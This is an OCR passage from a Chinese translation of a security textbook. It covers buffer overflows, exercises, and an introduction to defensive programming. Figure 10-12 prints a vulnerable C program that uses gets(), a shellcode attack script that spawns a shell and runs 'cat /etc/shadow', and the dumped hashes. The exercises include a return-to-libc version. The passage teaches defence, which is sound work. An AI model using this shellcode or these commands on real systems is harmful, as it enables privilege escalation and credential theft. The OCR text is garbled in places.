引用 ) 以 及 其 他 结构 的 引用 。 攻 击 的 目标 又 是 改写 一 些 函 数 指针 ， 攻 击 者 相信 这 是 接 下 来 被 攻 
击 的 程序 将 要 调用 的 函数 ， 通 过 改写 指针 将 控制 权 转移 到 攻击 者 选择 的 shellcode。 

这 些 攻击 的 防御 方法 包括 使 全 局 数据 区 成 为 不 可 执行 的 ， 将 函数 指针 设置 在 其 他 类 型 数据 
之 下 ， 以 及 在 全 局 数据 区 和 任何 其 他 的 管理 区 之 间 使 用 guard 页 。 


10.3.5 “其 他 类 型 的 溢出 


除了 我 们 已 经 讨论 的 缓冲 区 溢出 之 外 ， 还 有 包括 格式 化 字符 串 溢出 和 整数 溢出 等 在 内 的 很 
多 类 型 的 溢出 。 未 来 甚至 还 将 发 现 更 多 其 他 类 型 。 本 章 推荐 的 阅读 材料 中 给 出 的 参考 包括 另外 
一 些 变种 的 细节 内 容 。 特 别 地 ， 一 系列 缓冲 区 溢出 攻击 的 细节 可 以 查阅 [LHEE03] 和 [VEEN12]。 
重要 的 是 ， 如 果 程 序 首先 没有 正确 编码 保护 数据 结构 ， 针 对 它们 的 攻击 就 可 能 发 生 。 尽 
管 很 多 防御 方法 能 够 阻止 这 样 的 攻击 ， 但 一 些 像 图 10-1 (破坏 了 一 个 相 邻 的 变量 值 ， 这 在 某 
种 意义 上 改变 了 攻击 程序 的 行为 ) 所 示 的 示例 ， 不 能 简单 地 被 阻止 ， 而 要 通过 编码 阻止 它们 。 
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/* global static data - will be targeted for attack */ 
struct chunk { 

char inp[64); /* input buffer */ 

void (*process) (char *); /* pointer to function to process it */ 
} chunk; ; 


void showlen(char *buf) 


int len; 
len = strlen (buf); 
printf ("bufferé read td chars\n", len); 


main(int argc, char *argv[)) 


setbuf (stdin, NULL); 
chunk.process = showlen; 
printf("Enter value: "); 
gets (chunk. inp) ; 

chunk . process (chunk. inp) ; 
printf ("buffer6 done\n"); 





a) 存在 漏洞 的 全 局 数据 溢出 C 语 言 代码 


$ cat attack3 

#!/bin/sh 

# implement global data overflow attack against program bufferé 
perl -e ‘print pack("H*", 
“90909090909090909090909090909090" . 
"9090eb1a5e31c08846078d1le89S5e0889" . 
"460cb00b89f38d4e088d560ccd80e8el" . 
"Effftftf2f62696e2f7368202020202020" . 
"409704080a") ; 

print “whoami\n"; 

print "cat /etc/shadow\n";' 


$ attack3 | buffer6 

Enter value: 

root 

root :$1$4o0Inmych$T3BVS2E30yNRGjGUZF403/:13347:0:99999:7:::; 
daemon: *:11453:0:99999:7::: 


nobody: * 111453:0:99999:7::: 
knoppix: $1$p2wziIML$/yVHPQuw5kv1UFUs3b9aj /:13347:0:99999:7::: 





b) 全 局 数据 滋 出 攻击 示例 
图 10-12 全 局 数据 溢出 攻击 的 示例 


10.4 ”推荐 读物 


[LHEE03] 研究 了 一 系列 的 缓冲 区 溢出 技术 ， 包 括 很 多 本 章 没 有 提 到 的 可 能 的 防御 技术 。 
在 [HOGL04] 和 [ANLE07] 中 给 出 了 一 些 特别 值得 注意 的 特殊 方面 的 细节 。 最 早 的 缓冲 区 溢出 
攻击 的 公开 描述 可 参考 [LEVY96]。[KUPE05] 和 [VEEN12] 对 该 主题 提供 了 广泛 的 概述 。 为 了 
得 到 更 多 更 重要 的 关于 计算 机 系统 的 基本 结构 和 操作 的 细节 内 容 ， 包 括 栈 帧 和 进程 组 织 约 定 的 
细节 内 容 ， 可 以 查阅 [ STAL13]， 而 进程 和 操作 系统 的 细节 内 容 ， 可 以 查阅 [STAL14c]。 


ANLE07 Anley, C.; Heasman, J.; Lindner, F.; and Richarte, G. The Shellcoder's 
Handbook: Discovering and Exploiting Security Holes, Second Edition. 
Hoboken, NJ: John Wiley & Sons, 2007. 


HOGL04 Hoglund, G., and McGraw, G. Exploiting Software: How to Break Code. 
Reading, MA: Addison-Wesley, 2004. 


KUPEOS Kuperman, B., et al. “Detection and Prevention of Stack Buffer Overflow 
Attacks.” Communications of the ACM, November 2005. 


LEVY96 Levy, E. “Smashing The Stack For Fun And Profit.” Phrack Magazine, file 
14, Issue 49, November 1996. 


LHEE03 Lhee, K., and Chapin, S. “Buffer Overflow and Format String Overflow 
Vulnerabilities.” Software— Practice and Experience, Volume 33, 2003. 
STAL13 Stallings, W. Computer Organization and Architecture: Designing for 
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Performance, Ninth Edition. Upper Saddle River, NJ: Pearson, 2013. 

STAL14e Stallings, W. Operating Systems: Internals and Design Principles, Seventh 
Edition. Upper Saddle River, NJ: Pearson, 2014. 

VEENI12 van der Veen, V.; dutt-Sharma, N.; Cavallaro, L., and Bos, H. “Memory 
errors: the past, the present, and the future.” in Proceedings of the 15th 
international conference on Research in Attacks, Intrusions, and Defenses 
(RAID’12), Springer-Verlag, pp. 86-106, 2012. 


10.5 关键 术语 、 复 习题 和 习题 


关键 术语 

address space (地址 空间 ) nonexecutable memory (不 可 执行 的 内 存 ) 
buffer (缓冲 区 ) no-execute (不 可 执行 ) 

buffer overlow( 缓 冲 区 溢出 ) off-by-one( 差 一 错误 ) 

buffer overrun (缓冲 区 溢出 ) position independent (浮动 地 址 ) 

guard page (guard 页 ) stack frame ( 栈 帧 ) 

heap (HE) stack buffer overflow ( 栈 缓冲 区 溢出 ) 
heap overflow ( 堆 溢 出 ) stack smashing ( 栈 溢出 ) 

library function ( 库 函 数 ) vulnerability (漏洞 ) 


memory management (内 存 管理 ) 


复习 


10.1 
10.2 
10.3 
10.4 
10.5 
10.6 
10.7 
10.8 
10.9 
10.10 
10.11 
10.12 
10.13 
10.14 
10.15 
10.16 


习题 


10.1 使 用 UNIX 的 手册 页 (man page) 或 者 任何 C 语言 程序 设计 课本 ， 研 究 在 图 10-2 中 显示 的 每 一 个 


10.2 
10.3 


题 


给 出 缓冲 区 溢出 的 定义 。 

在 进程 的 地 址 空间 容易 发 生 缓冲 区 溢出 攻击 ， 请 列 出 作为 攻击 目标 的 三 种 不 同类 型 的 存储 单元 。 
缓冲 区 溢出 发 生 的 可 能 后 果 是 什么 ? 

为 了 实现 缓冲 区 溢出 ， 必 须 确定 的 两 个 关键 元 素 是 什么 ? 

哪 种 类 型 的 程序 设计 语言 容易 出 现 缓冲 区 溢出 漏洞 ? 

描述 一 个 栈 缓冲 区 溢出 攻击 是 如 何 实现 的 。 

给 出 shellcode 的 定义 。 

在 shellcode 中 经 常 发 现 哪些 约束 条 件 ? 如 何 避 免 ? 

描述 什么 是 NOP sled， 在 一 个 缓冲 区 滋 出 攻击 中 如 何 使 用 它 ? 

攻击 者 设计 shellcode 可 以 实施 攻击 ， 请 列 出 一 些 不 同 的 操作 。 

缓冲 区 溢出 的 两 类 防御 措施 是 什么 ? 

列 出 并 简要 描述 一 些 在 编译 新 程序 时 ， 能 够 使 用 的 防御 缓冲 区 溢出 的 方法 。 

列 出 并 简要 描述 一 些 在 运行 已 有 的 存在 漏洞 的 程序 时 ， 能 够 实现 的 防御 缓冲 区 溢出 的 方法 。 
描述 一 个 返回 导向 的 系统 调用 攻击 是 如 何 实现 的 ， 以 及 为 什么 使 用 它 。 

描述 一 个 堆 缓冲 区 溢出 攻击 是 如 何 实现 的 。 

描述 一 个 全 局 数据 区 溢出 攻击 是 如 何 实现 的 。 


不 安全 的 标准 C 语言 库 函数 ， 并 且 确 定 一 个 较 安 全 的 来 使 用 。 
重新 编写 图 10-1a 中 显示 的 程序 ， 使 其 不 再 有 缓冲 区 溢出 的 漏洞 。 
重新 编写 图 10-5a 中 显示 的 函数 ， 使 其 不 再 有 栈 缓冲 区 滋 出 的 漏洞 。 
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10.4 
10.5 


10.6 


10.7 
10.8 


10.9 


10.10 
10.11 
10.12 


10.13 


10.14 


重新 编写 图 10-7a 中 显示 的 函数 ， 使 其 不 再 有 栈 缓冲 区 溢出 的 漏洞 。 

在 图 10-8b 中 显示 的 shellcode 中 ， 假 设 系统 调用 execve 不 返回 (只 要 成 功 执行 shellcode 就 是 这 种 
情形 )。 然 而 ， 为 了 掩盖 它 调用 shellcode 失败 的 情形 ， 在 调用 之 后 扩充 代码 包含 另 一 个 系统 调用 ， 
就 是 exit(0)。 这 个 函数 的 执行 使 程序 能 够 正常 退出 ， 比 程序 异常 终止 可 以 减少 一 些 程序 员 的 注意 
力 。 增 加 一 些 额 外 的 汇编 指令 来 配置 参数 和 调用 这 个 系统 函数 ， 从 而 扩展 这 段 shellcode。 

使 用 图 10-8b 中 显示 的 原始 shellcode 或 者 习题 1.5 中 被 修改 的 代码 ， 尝 试 运行 栈 溢出 攻击 。 你 需要 
使 用 一 个 在 默认 设置 下 不 包括 栈 保护 机 制 的 旧版 本 操作 系统 。 然 后 确定 缓冲 区 和 栈 帧 的 存储 位 置 ， 
确定 攻击 字符 串 ， 以 及 编写 一 个 简单 的 程序 ， 对 这 些 内 容 编码 ， 以 此 实现 攻击 。 

在 PowerPC 处 理 器 (例如 通过 使 用 MacOS 或 者 PPCLinux distributions) 上 确定 一 些 汇编 语言 指令 ， 
实现 在 图 10-8a 中 显示 的 shellcode 的 功能 。 
研究 代替 标准 C 语言 字符 串 库 的 库 的 使 用 情况 ， 例 如 ，Libsafe 、bstring 、vstr 或 者 其 他 的 。 确 定 必 
要 的 代码 的 变化 情况 ， 如 果 有 变化 ， 使 用 选择 的 库 。 
确定 实现 返回 导向 的 系统 调用 攻击 的 shellcode， 它 调用 函数 system (“whoami;cat /etc/shadow;exit;” ), 
目标 是 习题 10.6 使 用 的 存在 漏洞 的 程序 。 你 需要 利用 调试 器 跟踪 一 个 合适 的 检测 程序 ， 识 别 在 目 
标 系统 上 标准 库 函 数 system) 的 存储 位 置 。 接 下 来 需要 确定 在 攻击 字符 串 中 使 用 的 地 址 和 数据 值 
的 正确 序列 ， 尝 试 运行 这 次 攻击 。 

重新 编写 图 10-10 中 显示 的 函数 ， 使 其 不 再 受到 缓冲 区 溢出 的 攻击 。 

重新 编写 图 10-11a 中 显示 的 程序 ， 使 其 不 再 有 堆 缓 冲 区 溢出 的 漏洞 。 

审查 一 些 来 自 CERT、SANS 或 者 类 似 组 织 公布 的 最 新 漏洞 ， 找 出 其 中 发 生 缓冲 区 溢出 攻击 的 漏 
洞 ， 并 对 每 一 个 使 用 的 缓冲 区 类 型 进行 分 类 ， 确 定 它 是 否 是 我 们 在 本 章 讨论 的 某 一 种 类 型 的 攻 
击 ， 还 是 另 一 个 变种 。 

研究 格式 化 字符 串 溢 出 攻击 的 细节 ， 它 是 如 何 工作 的 ， 它 使 用 的 攻击 字符 串 是 如 何 设计 的 ? 接 下 
来 对 一 个 合适 的 易 受 攻击 的 测试 程序 尝试 实现 这 种 攻击 。 

研究 整数 滋 出 攻击 的 细节 ， 它 是 如 何 工 作 的 ， 它 使 用 的 攻击 字符 串 是 如 何 设计 的 ? 接 下 来 对 一 个 
合适 的 易 受 攻击 的 测试 程序 尝试 实现 这 种 攻击 。 
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学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 ; 

© 描述 有 多 少 计算 机 安全 漏洞 是 由 不 良 的 编程 习惯 导致 的 ; 

© 描述 一 个 程序 的 抽象 视图 ， 并 详细 说 明 该 视图 中 可 能 存在 脆弱 点 的 位 置 ; 

© 描述 一 个 防御 性 的 程序 设计 方法 是 如 何 对 其 所 做 的 每 个 假设 进行 验证 ， 并 令 任 何 错 误 所 


导致 的 执行 失败 变 得 安全 而 优雅 的 ; 

详细 说 明 由 于 错误 处 理 程序 输入 、 没 有 检查 输入 的 长 度 或 解释 而 导致 的 很 多 问题 ; 
描述 在 实现 一 些 算法 时 发 生 的 问题 ; 

描述 由 于 程序 和 操作 系统 组 件 的 交互 导致 的 问题 ; 

描述 由 于 程序 输出 而 发 生 的 问题 。 


第 10 章 我 们 讨论 了 缓冲 区 溢出 的 问题 。 以 后 ， 缓 冲 区 溢出 还 将 是 一 个 最 常见 的 、 也 是 最 
容易 受到 攻击 的 软件 漏洞 。 尽 管 在 上 一 章 我 们 给 出 了 许多 应 对 策略 ， 但 是 针对 这 种 威胁 最 好 的 
防御 方法 就 是 不 允许 发 生 缓 冲 区 溢出 。 也 就 是 说 ， 程 序 需要 安全 地 编写 ， 从 而 阻止 这 样 的 漏洞 
的 出 现 。 

一 般 地 说 ， 缓 冲 区 溢出 只 是 在 不 严谨 的 程序 中 发 现 的 一 系列 缺陷 的 一 种 。 有 许多 的 漏洞 与 
程序 的 缺陷 有 关 ， 这 些 漏洞 导致 了 安全 机 制 的 破坏 ， 并 且 人 允许 对 计算 机 数据 和 资源 未 经 授权 的 
访问 和 使 用 。 

本 章 探讨 软件 安全 的 一 般 性 问题 。 我 们 介绍 一 个 计算 机 程序 的 简单 模型 ， 它 能 帮助 我 们 识 
别 在 什么 地 方 可 能 发 生 安全 问题 。 接 下 来 探讨 一 个 关键 问题 ， 那 就 是 如 何 正确 处 理 程序 的 输入 
来 阻止 多 种 类 型 漏洞 的 产生 ; 更 一 般 来 讲 ， 就 是 如 何 编写 安全 的 程序 代码 ， 以 及 如 何 管理 其 与 
操作 系统 和 其 他 程序 的 交互 。 


11.1 软件 安全 问题 


11.1.1 软件 安全 和 防御 性 程序 设计 


很 多 计算 机 安全 漏洞 都 是 由 于 不 严谨 的 编程 习惯 造成 的 。 表 11-1 中 总 结 了 CWE/SANS 评 
出 的 前 25 个 最 严重 的 软件 错误 (The CWE/SANS Top 25 Most Dangerous Software Errors)， 他 们 
一 致 认为 不 良 的 编程 习惯 是 导致 大 多 数 网 络 攻 击 的 原因 。 这 些 错 误 可 以 归纳 为 三 类 : 组 件 之 间 
的 不 安全 的 交互 、 高 风险 的 资源 管理 、 脆 弱 的 防御 。 同 样 ， 开 放 Web 应 用 安全 项 目 (The Open 
Web Application Security Project) 前 10 个 关键 的 Web 应 用 安全 性 漏洞 中 ， 有 5 个 与 不 安全 的 软 
件 程 序 代 码 相 关 ， 其 中 包括 未 经 验证 的 输入 、 跨 站 点 脚本 、 缓 冲 区 溢出 、 注 人 攻击 (injection 
faw) 和 不 恰当 的 错误 处 理 。 程 序 中 的 错误 代码 以 及 没有 充分 进行 检查 和 验证 的 数据 造成 了 
这 些 缺 陷 的 发 生 。 意 识 到 这 些 问 题 是 编写 安全 程序 代码 至 关 重 要 的 第 一 步 。CWE/SANS 以 及 
开放 Web 应 用 安全 项 目 所 列 出 的 错误 和 漏洞 ， 都 强调 了 软件 产业 对 开发 人 员 关 于 这 些 备 受 关 
注 的 安全 问题 的 解决 要 求 ， 并 对 如 何 解决 这 些 问题 提供 了 指导 。 本 章 我 们 讨论 所 有 这 些 安全 
缺陷 。 
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表 11-1 CWE/SANS 评 出 的 前 25 个 最 严重 的 软件 错误 ( 2011 ) 


软件 错误 类 型 : 组 件 之 间 的 不 安全 的 组 件 间 交 互 

对 SQL 命令 中 使 用 的 特定 元 素 处 理 不 当 (SQL HEA) 

对 操作 系统 命令 中 使 用 的 特定 元 素 处 理 不 当 (操作 系 统 命令 注 信 ) 
对 Web 页 生成 期 间 输入 的 处 理 不 当 ( 跨 站 点 脚本 ) 

对 危险 类 型 的 文件 不 受 限制 的 上 载 

跨 站 点 伪造 请 求 (CSRF ) 

重 定 向 到 不 受信 任 站 点 的 URL (开放 重 定向 ) 


软件 错误 类 型 : 高 风险 的 资源 管理 

未 检查 输入 长 度 就 进行 缓冲 区 复制 (经 典 的 缓冲 区 溢出) 
对 指向 受 限 目录 的 路 径 名 限定 不 当 (路径 穿 透 ) 

不 做 完整 性 检查 就 进行 代码 下 载 

包含 来 自 于 不 可 信 控 制 域 的 功能 

使 用 可 能 具有 危害 性 的 功能 

对 缓冲 区 大 小 计算 错误 

对 输入 的 字符 串 格式 不 加 控制 

整 型 溢出 或 环绕 


软件 错误 类 型 : 脆弱 的 防御 

对 关键 功能 的 授权 缺失 

授权 缺失 

使 用 硬 编码 的 证 书 

忽视 对 敏感 数据 的 加 密 

在 安全 决策 中 信赖 不 可 信和 的 输入 

在 不 必要 的 特权 级 别 下 运行 
授权 不 当 

对 重要 资源 的 权限 分 配 不 当 

使 用 已 被 破解 的 或 者 有 风险 的 加 密 算法 
对 过 度 的 认证 尝试 未 予以 适当 的 限制 
使 用 单 向 散 列 函数 时 没有 给 输入 加 盐 


软件 安全 与 软件 质量 和 可 靠 性 紧密 相关 ， 但 又 略 有 不 同 。 软 件 质量 和 可 靠 性 关心 的 是 一 
个 程序 是 否 意外 出 错 ， 这 些 错 误 是 由 一 些 随机 的 未 预料 的 输入 、 系 统 交 互 或 者 使 用 错误 代码 引 
起 的 ， 它 们 服从 一 些 形式 的 概率 分 布 。 提 高 软件 质量 通常 的 方法 ， 是 采用 某 些 形式 的 结构 化 
设计 ， 并 通过 测试 来 尽量 识别 和 消除 程序 中 的 bug， 一 般 包括 可 能 的 输入 变化 和 常见 的 错误 测 
试 ， 目 的 是 在 平常 的 使 用 中 让 bug 的 数目 最 少 。 但 是 软件 安全 关心 的 不 是 程序 中 bug 的 总 数 ， 
而 是 这 些 bug 是 如 何 被 触发 导致 程序 失败 的 。 

软件 安全 不 同 于 软件 质量 和 可 靠 性 ， 攻 击 者 不 会 依据 一 定 的 概率 分 布 实施 攻击 ， 他 们 的 目 
标 是 那些 特殊 的 可 以 利用 的 bug， 从 而 造成 程序 失败 。 这 些 bug 经 常 能 够 通过 一 些 罕见 的 输入 
被 触发 ， 因 此 一 般 的 测试 方法 很 难 发 现 。 编 写 安 全 的 程序 代码 需要 关注 一 个 程序 执行 的 各 个 方 
面 、 它 执行 的 环境 以 及 它 处 理 的 数据 类 型 。 没 什么 错误 能 够 被 假设 ， 所 有 潜在 的 错误 都 必须 被 
检查 。 这 些 问题 在 以 下 的 定义 中 比较 突出 : 


防御 性 程序 设计 或 安全 程序 设计 ( Defensive or Secure Programming) 是 一 个 软件 设计 与 实现 
流程 ， 目 的 是 使 生成 的 软件 即使 在 面临 攻击 时 仍然 能 够 继续 工作 。 如 此 编写 而 成 的 软件 能 
够 检测 出 由 攻击 所 引发 的 错误 条 件 ， 并 能 继续 安全 地 执行 ; 或 者 即使 执行 失败 ， 也 能 优雅 


地 “落地 ”。 防 御 性 程序 设计 的 关键 是 绝 不 做 任何 假设 ， 但 是 要 检查 所 有 的 假设 ， 并 处 理 任 
何 可 能 的 错误 状态 。 
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这 个 定义 强调 ， 需 要 对 一 个 程序 将 要 如 何 运行 以 及 它 将 如 何 处 理 各 种 类 型 的 输入 做 出 明确 
的 假设 。 为 了 帮助 弄 清 这 个 问题 ， 我 们 讨论 在 图 11-1 S 中 给 出 的 一 个 程序 的 抽象 模型 。 这 个 图 
说 明了 在 大 多 数 程序 设计 入 门 性 课程 中 讲授 的 概念 。 一 个 程序 从 各 种 可 能 的 数据 源 读 取 输 入 的 
数据 ， 并 且 依 据 某 些 算法 处 理 这 些 数 据 ， 接 着 产生 输出 ， 可 能 是 输出 到 多 个 不 同 的 目的 地 。 程 
序 使 用 一 些 特殊 处 理 器 类 型 的 机 器 指令 ， 在 某 些 操作 系统 提供 的 环境 下 执行 。 当 处 理 这 些 数据 
的 时 候 ， 程 序 使 用 系统 调用 ， 也 可 能 使 用 系统 上 可 用 的 其 他 应 用 程序 。 这 些 操作 能 够 造成 系统 
上 的 数据 被 保存 或 修改 ， 或 者 引起 对 程序 执行 结果 的 负面 影响 。 所 有 这 些 方面 能 够 彼此 相互 作 
用 ， 且 相互 作用 的 方式 经 常 是 比较 复杂 的 。 


计算 机 系统 






图 形 用 户 接口 
(GUI) 显示 


图 11-1 一 个 程序 的 抽象 模型 


当 编 写 一 个 程序 时 ， 程 序 员 通常 关注 的 是 解决 程序 涉及 的 各 种 各 样 的 问题 ， 因 此 他 们 的 注 
意 力 集中 在 成 功 完 成 一 个 程序 所 需要 的 步骤 和 执行 一 个 程序 的 正常 流程 ， 而 不 是 考虑 造成 程序 
失败 的 每 一 个 可 能 的 地 方 。 他 们 经 常 对 一 个 程序 将 要 接收 的 输入 类 型 和 程序 执行 的 环境 做 出 各 
种 各 样 的 假设 。 防 御 性 程序 设计 意味 着 程序 需要 验证 所 有 这 些 假设 ,所 有 可 能 的 失败 都 能 安全 
且 完 美 地 得 到 解决 。 正 确 预 测 、 检 查 和 处 理 所 有 可 能 的 错误 ， 当 然 会 提高 代码 开发 的 成 本 ， 增 
加 程序 编写 的 时 间 ， 这 正好 与 控制 程序 开发 的 时 间 尽 可 能 短 以 保证 市 场 效 益 最 大 化 的 商业 压力 
冲突 。 除 非 从 程序 开发 开始 时 就 把 软件 安全 作为 设计 目标 ， 否 则 程序 安全 很 难保 证 。 

而 且 ， 当 程序 员 改 编 一 个 程序 时 ， 他 经 常 关注 的 是 哪些 需要 改变 和 需要 达到 什么 样 的 需 
求 。 防 御 性 程序 设计 又 意味 着 程序 员 必须 仔细 检查 他 所 做 的 每 一 个 假设 ， 检 查 和 处 理 所 有 可 能 
的 错误 ， 仔 细 检 查 与 存在 的 代码 之 间 的 每 一 个 交互 。 不 能 识别 和 处 理 这 些 交 互 可 能 会 导致 错误 
的 程序 行为 ， 以 及 将 一 个 原来 安全 的 程序 变 成 一 个 存在 漏洞 的 程序 。 

传统 的 程序 设计 强调 的 是 程序 可 以 解决 大 多 数 用 户 在 大 部 分 时 间 和 希望 解决 的 问题 ， 然 而 
防御 性 程序 设计 需要 程序 员 有 一 个 不 同 的 心态 。 程 序 员 需 要 了 解 失 败 的 后 果 ， 以 及 攻击 者 使 用 
的 技术 。 大 量 增长 的 漏洞 报告 真实 地 反映 出 攻击 者 就 是 在 不 断 地 想 尽 办 法 攻击 你 。 这 种 心态 让 
人 不 得 不 感受 到 正常 的 测试 技术 不 能 发 现 更 多 可 能 存在 的 漏洞 ， 但 是 这 些 漏洞 可 能 通过 罕见 或 
者 未 知 的 输入 触发 。 程 序 员 需要 不 断 地 学 习 摸 索 ， 从 前 面 已 经 发 现 的 错误 中 吸取 教训 ， 在 新 的 
程序 中 避免 再 犯 相同 的 错误 。 程 序 设计 就 好 像 一 个 工程 一 样 ， 要 能 够 面 对 和 解决 任何 错误 和 预 
料 不 到 的 问题 。 程 序 员 必须 明白 程序 的 失败 是 如 何 发 生 的 ， 清 楚 减 少 失败 发 生 的 机 会 需要 哪些 
步骤 。 


© ”这 个 图 是 对 文献 [WHEE03] 中 图 1-1 的 扩展 和 详细 说 明 。 
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从 一 个 项 目的 初始 阶段 就 把 安全 性 和 可 靠 性 作为 设计 目标 ， 这 种 需求 长 时 间 以 来 已 经 成 
为 大 多 数 工 程 学 科 的 共识 。 一 般 来 说 ， 社 会 对 桥梁 倒塌 、 建 筑 物 倒塌 和 飞机 失事 采取 了 不 宽容 
的 态度 ， 这 些 项 目 在 设计 时 被 要 求 必须 尽 最 大 可 能 避免 这 类 莫 剧 的 发 生 。 软 件 开发 没有 这 么 严 
重 ， 人 们 对 于 软件 开发 的 失败 远 比 其 他 工程 学 科 要 宽容 得 多 。 尽 管 软件 工程 师 们 已 经 十 分 尽 
力 ， 并 且 业 界 也 已 经 开发 了 一 系列 软件 开发 和 质量 标准 [SE106]、[ISO12207]， 但 现状 就 是 如 


' 此 。 尽 管 上 述 标准 的 重点 在 于 软件 开发 的 生存 周期 ， 它 们 已 开始 逐步 地 将 安全 视 为 一 个 关键 的 


设计 目标 。 近 年 来 ， 人 们 用 在 改进 安全 软件 开发 流程 上 的 努力 越 来 越 多 。 由 众多 主要 的 IT 公 
司 加 盟 的 “ 迈 向 卓越 代码 的 软件 保障 论坛 "(SAFECode)， 在 其 出 版 物 中 概括 了 业界 最 好 的 软件 
保障 实践 ， 并 就 已 经 过 证 明 的 安全 软件 开发 的 实现 给 出 了 建议 ，[SIMP11] 就 是 这 些 出 版 物 中 
的 一 个 。 本 章 我 们 将 讨论 他 们 推荐 的 软件 安全 开发 方法 。 

然而 ， 软 件 开发 的 技术 和 标准 及 其 与 软件 安全 的 集成 ， 这 些 主题 已 经 远 远 超出 了 我 们 这 本 
书 的 讨论 范围 ，[MCGR06] 和 [VIEG01] 提供 了 关于 这 些 主题 更 多 的 细节 内 容 。[SIMP11] 推荐 
将 威胁 建 模 (也 称 作 风险 分 析 ) 并 入 设计 过 程 当中 。 我 们 将 在 第 14 章 讨 论 这 些 问 题 。 这 里 我 
们 讨论 一 些 特殊 的 软件 安全 问题 ， 这 些 问 题 应 该 并 入 一 种 范围 更 大 的 开发 方法 中 。 下 面 我 们 考 
察 与 正在 执行 的 程序 进行 各 种 交互 的 软件 安全 问题 ， 就 像 在 图 11-1 中 显示 的 那样 。 首 先 从 处 
理 安全 输入 的 关键 问题 人 手 ， 接 着 讨论 和 算法 实现 、 与 其 他 组 件 的 交互 以 及 程序 的 输出 等 相关 
的 安全 问题 。 在 分 析 这 些 潜在 的 安全 问题 时 ， 我 们 不 得 不 承认 很 多 安全 漏洞 是 由 一 小 部 分 常见 
错误 导致 的 ， 我 们 就 讨论 这 些 问 题 。 

本 章 中 的 例子 主要 集中 在 Web 应 用 的 安全 问题 。 在 这 些 应 用 程序 快速 开发 过 程 中 ， 经 常 
由 于 开发 者 没有 足够 的 软件 安全 意识 ， 以 及 通过 互联 网 陷入 攻击 者 制造 的 一 个 大 陷阱 ， 造 成 这 
些 应 用 非常 容易 受到 攻击 。 然 而 ， 我 们 强调 这 里 所 讨论 的 原理 可 以 应 用 于 所 有 的 程序 。 我 们 需 
要 一 直 遵 循 安 全 的 程序 设计 理念 ， 甚 至 是 那些 看 起 来 无 害 的 程序 ， 因 为 要 预测 程序 未 来 的 应 用 
是 非常 困难 的 。 有 时 一 个 简单 的 为 本 地 应 用 设计 的 工具 ， 可 能 后 来 会 被 并 人 一 个 较 大 的 应 用 ， 
如 Web 上 能 够 使 用 的 应 用 ， 由 此 可 能 造成 重大 的 安全 隐患 。 


11.2 ， 处 理 程序 输入 


对 程序 输入 不 正确 的 处 理 是 软件 安全 最 常见 的 失误 之 一 。 程 序 输入 是 指 程序 之 外 的 任意 数 
据 源 ， 程 序 员 在 编写 代码 的 时 候 并 不 清楚 地 知道 这 些 数 据 的 值 。 程 序 输入 显然 包括 了 从 用 户 键 
盘 、 鼠 标 、 文 件 或 者 网 络 连 接 读 人 到 程序 中 的 数据 。 然 而 ， 它 也 包含 了 在 执行 环境 中 提供 给 程 
序 的 数据 、 程 序 从 文件 读 人 的 任意 配置 值 或 者 其 他 的 数据 ， 以 及 操作 系统 提供 给 程序 的 值 。 所 
有 用 于 输入 的 数据 源 ， 以 及 对 它们 的 类 型 和 存储 长 度 做 出 的 任何 假设 都 要 进行 识别 。 程 序 代 码 
必须 明确 验证 这 些 假 设 ， 所 有 的 值 必须 与 这 些 假 设 保持 一 致 。 任 何 程序 输入 都 有 两 个 关键 点 需 
要 我 们 考虑 ， 这 就 是 输入 的 长 度 及 输入 的 含义 和 解释 。 


11.2.1 输入 的 长 度 和 缓冲 区 溢出 


当 程 序 员 从 一 些 数 据 源 读 取 或 者 拷贝 输入 数据 的 时 候 ， 他 们 经 常 对 这 些 输 入 数据 的 最 大 长 
度 做 出 假设 。 如 果 输 入 数据 是 用 户 键 人 的 文本 ， 无 论 是 作为 程序 的 一 个 命令 行 参数 ， 还 是 作为 
响应 提示 符 的 输入 ， 这 时 假设 的 输入 长 度 经 常 不 超过 几 行 。 所 以 ， 程 序 员 设 置 一 个 典型 的 512 
字 节 或 者 1024 字 节 的 缓冲 区 用 来 存储 这 些 输入 ， 但 通常 并 不 检查 确认 实际 输入 的 内 容 是 否 多 
于 假设 的 长 度 。 如 果 输 入 数据 超出 缓冲 区 的 范围 ， 那 么 就 会 发 生 一 个 缓冲 区 溢出 ， 它 可 能 危害 
程序 的 执行 。 在 第 10 章 我 们 详细 地 讨论 了 缓冲 区 溢出 的 问题 。 由 于 提供 的 输入 测试 数据 通常 
仅 能 反映 程序 员 希 望 用 户 提供 的 输入 范围 ， 因 此 程序 的 测试 不 能 很 好 地 识别 缓冲 区 溢出 的 漏 
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洞 。 这 些 测试 输入 不 大 可 能 包含 那些 诱发 缓冲 区 溢出 的 众多 的 输入 ， 除 非 这 个 漏洞 被 明确 地 测 
试 到 。 

许多 广泛 使 用 的 C 语言 的 标准 库 例 程 ( 表 10-2 中 列 出 了 其 中 的 一 些 )， 它 们 都 存在 着 一 个 
问题 ， 就 是 没有 提供 任何 方法 限制 转移 到 缓冲 区 可 用 空间 的 数据 的 数量 。 在 10.2 节 中 我 们 已 
经 讨论 了 一 系列 与 阻止 缓冲 区 溢出 相关 的 安全 程序 设计 实践 。 

针对 缓冲 区 溢出 编写 安全 的 程序 代码 需要 有 一 种 心态 ， 就 是 认为 任何 输入 都 存在 危险 ， 在 
处 理 输入 时 不 要 使 程序 面临 危险 。 关 于 输入 的 长 度 ， 就 是 使 用 动态 缓冲 区 确保 有 足够 的 有 效 空 
间 ， 或 者 把 输入 数据 处 理 成 缓冲 区 长 度 的 数据 块 。 即 使 使 用 动态 缓冲 区 ， 程 序 员 也 一 定 要 细心 
处 理 ， 保 证 请 求 的 空间 不 会 超出 内 存 可 用 的 范围 。 一 旦 超出 内 存 可 用 的 范围 ， 程 序 必 须 能 够 很 
好 地 处 理 这 个 错误 。 这 可 能 会 涉及 在 缓冲 区 块 中 处 理 输入 、 抛 弃 多 余 的 输入 、 中 断 程 序 ， 或 者 
任何 其 他 的 合理 响应 异常 状态 的 动作 。 这 些 检查 必须 应 用 到 任何 地 方 的 数据 ， 只 要 这 个 数据 的 
值 是 需要 程序 处 理 的 或 者 未 知 输入 的 。 它 们 也 必须 应 用 到 所 有 潜在 的 输入 源 。 


11.2.2 程序 输入 的 解释 


程序 输入 的 另 一 个 需要 关注 的 问题 是 它 的 含义 和 解释 。 总 的 来 说 ， 程 序 输入 数据 可 分 为 文 
